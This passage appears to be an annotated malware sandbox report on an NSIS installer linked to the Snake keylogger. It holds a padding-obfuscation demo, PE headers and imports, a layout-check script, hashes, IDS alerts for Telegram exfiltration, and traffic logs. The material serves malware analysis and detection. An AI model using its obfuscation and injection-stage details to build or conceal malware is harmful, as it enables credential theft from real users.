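FILLER = "barrikaderingersRemserneTaktikkenAgglutinationsSplendidtAkkilessenes"


def pad(script: str, stride: int = 8, offset: int = 7) -> str:
    """Test helper: hide `script` by surrounding each character with filler."""
    junk = cycle(FILLER)
    blocks = []
    for ch in script:
        block = [next(junk) for _ in range(stride - 1)]
        block.insert(offset, ch)
        blocks.append("".join(block))
    return "".join(blocks)


HIDDEN = "$Weals=$Hjemmemenneskets;\r\nfunction Ovenman($Straatagets){ $Straatagets }"
SAMPLE = ("$Lated28=$Granulationerne;\r\n"
          "<#barrikaderingers Remserne Taktikken Agglutinations Splendidt #>\r\n"
          "$griflede = @'\r\n" + pad(HIDDEN) + "\r\n'@\r\n")

if __name__ == "__main__":
    for script in decode(SAMPLE):
        print(script)
```

Run the recovered text through the same decoder again: this family usually nests a second padded layer and a final stage that resolves VirtualAlloc/NtProtectVirtualMemory by name, which is where the injection signatures listed for this sample come from.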
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.167726 (a signature match by the file-type identifier, not a real thermal image: treat this 351 KB blob at entropy 7.62 as opaque data)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):351494
                                                                                                  Entropy (8bit):7.617756558103273
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:eGcGrVt2f+HvURtQ/3rheYxP4Eb0UXMAvXWU2kb+MqtFDcmz9fKkL8usK:5W+s/Q/3VjWa0UXMAl+ptlrt8usK
                                                                                                  MD5:005E43CCC24B66B9D72405C0D1BA5503
                                                                                                  SHA1:45B673AFA54E7E7DBD479901402D1D8499B386D1
                                                                                                  SHA-256:B25848DD6BFF93E4F6BB007053E1575904E7DD2BF7ACC242141FF12A766C77AB
                                                                                                  SHA-512:2B650953FBBE5FED2DECB69D92975F40A1235B0622C6348A5C6A362FD93144915C88C55D6467A1E009548F358CF95E3822B6ECE33137ED8D33D480E8960C5ACE
                                                                                                  Malicious:false
                                                                                                  Preview:.........ww.......k...............__.....;;.......FFF....................................h.f.....mm..............$..777.```.....L.............9................?.......6......d...@@......QQ.........$...>......$..[......==.8....~~............0..........0.....|.................+++.aaaa....?...................Y............E.AA.....11111.........NN.......o..........zzz...+.W....Z...............XX..ooo...S...............!!.W...f.**.)... .....yyy..o............................11...;;....*....,.......................}.......H...........77....$$$.....0.......Y.......k.......V............-----.v................................................................LLLLLLL.o...QQ.......ggg........""...........................&............#.Y...w......"".........................EEE..................``..ee..............N.....L.....................0.:.............................44...a.....hh...{.....#..T.........OO..eee..............................f.......N.......XX........ssss........o..........7....JJ.
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                  Entropy (8bit):7.86126561414568
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:dP5z8RpEyQ.exe
                                                                                                  File size:841'568 bytes
                                                                                                  MD5:307b33a50dcda8511f357c5de9da6b02
                                                                                                  SHA1:ea0cd2a9546e4634ebd3cfe37fd73f5a8aabd0b8
                                                                                                  SHA256:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1
                                                                                                  SHA512:6616c5c2feb38b86a4083f9b6c2c4734459dbbab356cb35388a60908b245e374fb70d1df0428c1da52f4ff94e79d32711ce1fa37ac89f08f5ffb8d491d99e95e
                                                                                                  SSDEEP:24576:8Vh9IS4w4n7/adSqdf9IacPYkAevLRPJyz:O9P4n7/KrdfmD3RtJS
                                                                                                  TLSH:4A051207222AE1E0D82CC836451775F65BC95C219D0E6E2B3156BF3B39F12E4BE1B627
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@
                                                                                                  Icon Hash:0765c050447c3e01
                                                                                                  Entrypoint:0x403325
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b
Signature Valid:false
Signature Issuer:CN=Thoroughbred, O=Thoroughbred, L=Charlton Mackrell, C=GB
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487 (0x800B0109, CERT_E_UNTRUSTEDROOT)
Not Before / Not After:
• 05/12/2023 12:17:23 to 04/12/2026 12:17:23
Subject Chain:
• CN=Thoroughbred, O=Thoroughbred, L=Charlton Mackrell, C=GB
Note: issuer and subject are identical, so this is a self-signed certificate and the untrusted-root error is the expected outcome. "Digitally signed: true" above only records that a certificate table is present; treat the signature as an attacker-supplied artifact (the thumbprints and serial below are useful pivots for finding sibling samples), not as a trust signal. The certificate's validity start (2023) also postdates the PE time stamp (Jul 2021), which is the link time of the prebuilt NSIS stub rather than the time this installer was assembled.
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:031152494D592A99669DB3F3539F61F7
                                                                                                  Thumbprint SHA-1:E77DF1696E678E92DB95E3557691C328EA7CC347
                                                                                                  Thumbprint SHA-256:96DB86FDFC333496B46E6C1420E37485ED4B295653B692695AFC378A7340044C
                                                                                                  Serial:6F1FAD878FAC814B17C636D3C3A39D1592C98235
                                                                                                  Instruction
                                                                                                  sub esp, 00000184h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  xor ebx, ebx
                                                                                                  push 00008001h
                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                  call dword ptr [004080B8h]
                                                                                                  call dword ptr [004080BCh]
                                                                                                  and eax, BFFFFFFFh
                                                                                                  cmp ax, 00000006h
                                                                                                  mov dword ptr [007A2F6Ch], eax
                                                                                                  je 00007FF478DE55E3h
                                                                                                  push ebx
                                                                                                  call 00007FF478DE8746h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FF478DE55D9h
                                                                                                  push 00000C00h
                                                                                                  call eax
                                                                                                  mov esi, 004082A0h
                                                                                                  push esi
                                                                                                  call 00007FF478DE86C2h
                                                                                                  push esi
                                                                                                  call dword ptr [004080CCh]
                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                  cmp byte ptr [esi], bl
                                                                                                  jne 00007FF478DE55BDh
                                                                                                  push 0000000Bh
                                                                                                  call 00007FF478DE871Ah
                                                                                                  push 00000009h
                                                                                                  call 00007FF478DE8713h
                                                                                                  push 00000007h
                                                                                                  mov dword ptr [007A2F64h], eax
                                                                                                  call 00007FF478DE8707h
                                                                                                  cmp eax, ebx
                                                                                                  je 00007FF478DE55E1h
                                                                                                  push 0000001Eh
                                                                                                  call eax
                                                                                                  test eax, eax
                                                                                                  je 00007FF478DE55D9h
                                                                                                  or byte ptr [007A2F6Fh], 00000040h
                                                                                                  push ebp
                                                                                                  call dword ptr [00408038h]
                                                                                                  push ebx
                                                                                                  call dword ptr [00408288h]
                                                                                                  mov dword ptr [007A3038h], eax
                                                                                                  push ebx
                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                  push 00000160h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  push 0079E528h
                                                                                                  call dword ptr [0040816Ch]
                                                                                                  push 0040A188h
                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8438 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3bd000 | 0x14130 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcce38 | 0x928 | .data (see note)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Note: the address in the SECURITY entry is a file offset, not an RVA (it is the one directory entry defined that way), so the ".data" attribution is an artifact of looking 0xcce38 up in the section table. 0xcce38 + 0x928 = 0xcd760 = 841,568, exactly the file size: the Authenticode certificate table is the last 2,344 bytes of the file. The empty BASERELOC entry matches RELOCS_STRIPPED in the file characteristics above; with no relocations the loader cannot move the image, so DYNAMIC_BASE in the DLL characteristics has no effect and the stub runs at its preferred base 0x400000.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6230 | 0x6400 | 1ac97b0b8e41e1ffbb716878bb5109f2 | False | 0.6699609375 | data | 6.441889952551939 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1274 | 0x1400 | b8e42f3d3b81b0e2a4080ab31bc2d1f4 | False | 0.4337890625 | data | 5.061067348371254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x399078 | 0x600 | be2892f1b11a971e0c6c4e83000268f5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a4000 | 0x19000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3bd000 | 0x14130 | 0x14200 | 74d1354884b47e58064558c4fcf827a8 | False | 0.21642080745341616 | data | 5.032566659343803 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Note: the raw sizes total 0x1c000 (114,688) bytes against a file size of 841,568, so roughly 720 KB of the file lies outside the sections as an overlay: the NSIS archive (the file type above is "Nullsoft Installer self-extracting archive") followed by the certificate table. .data is backed by only 0x600 bytes on disk but occupies 0x399078 bytes (about 3.7 MB) in memory, zero-filled and writable after load; .ndata is NSIS's own uninitialized section. The MD5 of .ndata is the hash of the empty string, consistent with its raw size of 0.
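The layout checks a triage script should run over these tables, written out here as an added example for this report rather than Joe Sandbox code. The numbers are the ones in the directory and section tables; the report does not list raw (on-disk) section offsets, so the 0x400 header size and 0x200 file alignment used to place sections on disk are assumptions (the usual values for a VC++ 6 link) and the overlay figure is an estimate to be confirmed with a PE parser on the file itself. It also reproduces the SECURITY-entry misattribution: read the file offset 0xcce38 as an RVA and it lands in .data.

```python
"""PE layout checks for the directory and section tables in this report.

Added example (not Joe Sandbox code). Values are copied from the tables;
HEADER_SIZE and FILE_ALIGNMENT are assumptions because the report omits raw
section offsets.
"""

FILE_SIZE = 841_568                      # "File size: 841'568 bytes"
IMAGE_BASE = 0x400000                    # "Imagebase"
ENTRY_POINT = 0x403325                   # "Entrypoint"
SECURITY_DIRECTORY = (0xCCE38, 0x928)    # (file offset, size): this entry is not an RVA
HEADER_SIZE = 0x400                      # assumption
FILE_ALIGNMENT = 0x200                   # assumption
SECTION_ALIGNMENT = 0x1000               # implied by the section RVAs

# (name, virtual address, virtual size, raw size) from the section table
SECTIONS = [
    (".text",  0x1000,   0x6230,   0x6400),
    (".rdata", 0x8000,   0x1274,   0x1400),
    (".data",  0xA000,   0x399078, 0x600),
    (".ndata", 0x3A4000, 0x19000,  0x0),
    (".rsrc",  0x3BD000, 0x14130,  0x14200),
]


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment


def sections_are_contiguous(sections=SECTIONS, section_alignment=SECTION_ALIGNMENT) -> bool:
    """Each RVA must be the previous section's end rounded up to the section
    alignment; a gap or overlap means the header was edited by hand."""
    for (_, va, vsize, _), (_, next_va, _, _) in zip(sections, sections[1:]):
        if align_up(va + vsize, section_alignment) != next_va:
            return False
    return True


def section_containing(address: int, sections=SECTIONS, image_base=IMAGE_BASE):
    """Name of the section whose in-memory span covers a virtual address, or None."""
    rva = address - image_base
    for name, va, vsize, _ in sections:
        if va <= rva < align_up(va + vsize, SECTION_ALIGNMENT):
            return name
    return None


def end_of_section_data(sections=SECTIONS, header_size=HEADER_SIZE,
                        file_alignment=FILE_ALIGNMENT) -> int:
    """File offset just past the last section's raw bytes, assuming sections are
    stored back to back after the headers in table order."""
    offset = header_size
    for _, _, _, raw_size in sections:
        offset += align_up(raw_size, file_alignment)
    return offset


def overlay_size(file_size=FILE_SIZE, sections=SECTIONS) -> int:
    """Bytes after the last section: the NSIS archive plus the certificate table."""
    return file_size - end_of_section_data(sections)


def certificate_table_is_at_eof(file_size=FILE_SIZE, security=SECURITY_DIRECTORY) -> bool:
    """An Authenticode signature is appended after the overlay, so the SECURITY
    entry's file offset plus its size should equal the file size."""
    offset, size = security
    return offset + size == file_size


def inflated_sections(sections=SECTIONS, ratio: int = 16) -> list:
    """Initialized sections whose in-memory size dwarfs the bytes backing them on
    disk (the loader zero-fills the rest). Pure BSS sections (raw size 0) such as
    NSIS's .ndata are expected and skipped."""
    return [name for name, _, vsize, raw in sections if raw and vsize >= ratio * raw]


def report() -> dict:
    return {
        "contiguous_rvas": sections_are_contiguous(),
        "entry_point_section": section_containing(ENTRY_POINT),
        "security_entry_if_read_as_rva": section_containing(IMAGE_BASE + SECURITY_DIRECTORY[0]),
        "section_data_end": end_of_section_data(),
        "overlay_bytes": overlay_size(),
        "overlay_without_signature": overlay_size() - SECURITY_DIRECTORY[1],
        "signature_at_eof": certificate_table_is_at_eof(),
        "inflated_sections": inflated_sections(),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

The overlay estimate (about 725 KB, of which 2,344 bytes are the certificate table) is where the NSIS archive and, inside it, the dropped files listed above live; that is the region to carve with an NSIS extractor, not the sections.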
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3bd448 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 0 | English | United States | 0.1216102585663233
RT_ICON | 0x3c68f0 | 0x2ca8 | Device independent bitmap graphic, 96 x 192 x 8, image size 0 | English | United States | 0.33869839048285516
RT_ICON | 0x3c9598 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.22634854771784232
RT_ICON | 0x3cbb40 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.31636960600375236
RT_ICON | 0x3ccbe8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.30676972281449894
RT_ICON | 0x3cda90 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.4413934426229508
RT_ICON | 0x3ce418 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.3768050541516246
RT_ICON | 0x3cecc0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.4400921658986175
RT_ICON | 0x3cf388 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.14634146341463414
RT_ICON | 0x3cf9f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.43786127167630057
RT_ICON | 0x3cff58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.37056737588652483
RT_ICON | 0x3d03c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.18548387096774194
RT_ICON | 0x3d06a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.4594594594594595
RT_DIALOG | 0x3d07d0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3d08d0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3d09f0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3d0ab8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3d0b18 | 0xbc | data | English | United States | 0.601063829787234
RT_VERSION | 0x3d0bd8 | 0x214 | data | English | United States | 0.5338345864661654
RT_MANIFEST | 0x3d0df0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Note: this is the stock NSIS stub import set (ExitWindowsEx, the clipboard calls and SHFileOperationA account for the "shutdown / reboot" and "read data from the clipboard" signatures). What is absent matters more: no VirtualAllocEx, WriteProcessMemory, QueueUserAPC or CreateRemoteThread. The APC (early bird) injection and the Telegram traffic in the signature list therefore come from the dropped PowerShell stage and the code it loads, with APIs resolved at run time (GetProcAddress and LoadLibraryExA are imported). Consequently the Import Hash above identifies the NSIS stub, not this payload, and is a weak pivot.
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T12:06:06.476206+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49813 | 172.217.19.174 | 443 | TCP
2024-12-17T12:06:20.639801+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49834 | 193.122.130.0 | 80 | TCP
2024-12-17T12:06:26.702351+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49834 | 193.122.130.0 | 80 | TCP
2024-12-17T12:06:29.129790+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49867 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 12:06:03.695621014 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:03.695658922 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:03.695735931 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:03.706338882 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:03.706353903 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:05.592294931 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:05.592370033 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:05.593064070 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:05.593111992 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:05.641726971 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:05.641753912 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:05.642086029 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:05.642137051 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:05.644370079 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:05.691329956 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:06.476211071 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:06.476639986 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:06.476665020 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:06.476773024 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:06.476773024 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:06.476836920 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:06.477047920 CET | 443 | 49813 | 172.217.19.174 | 192.168.2.5
Dec 17, 2024 12:06:06.477127075 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:06.477127075 CET | 49813 | 443 | 192.168.2.5 | 172.217.19.174
Dec 17, 2024 12:06:06.714679956 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:06.714778900 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:06.716315031 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:06.717165947 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:06.717200041 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:08.417800903 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:08.418935061 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:08.422559023 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:08.422590971 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:08.422921896 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:08.426235914 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:08.427387953 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:08.471338034 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.455449104 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.455564976 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.468358040 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.468493938 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.575191021 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.575292110 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.575356960 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.575769901 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.577380896 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.577512980 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.646929979 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.647000074 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.651089907 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.653223991 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.653248072 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.653321028 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.656657934 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.662256956 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.664386034 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.664489985 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.665747881 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.668237925 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.673661947 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.673784971 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.676435947 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.680191994 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.683732033 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.683825970 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.690607071 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.690677881 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.694201946 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.694273949 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.703826904 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.703906059 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.707389116 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
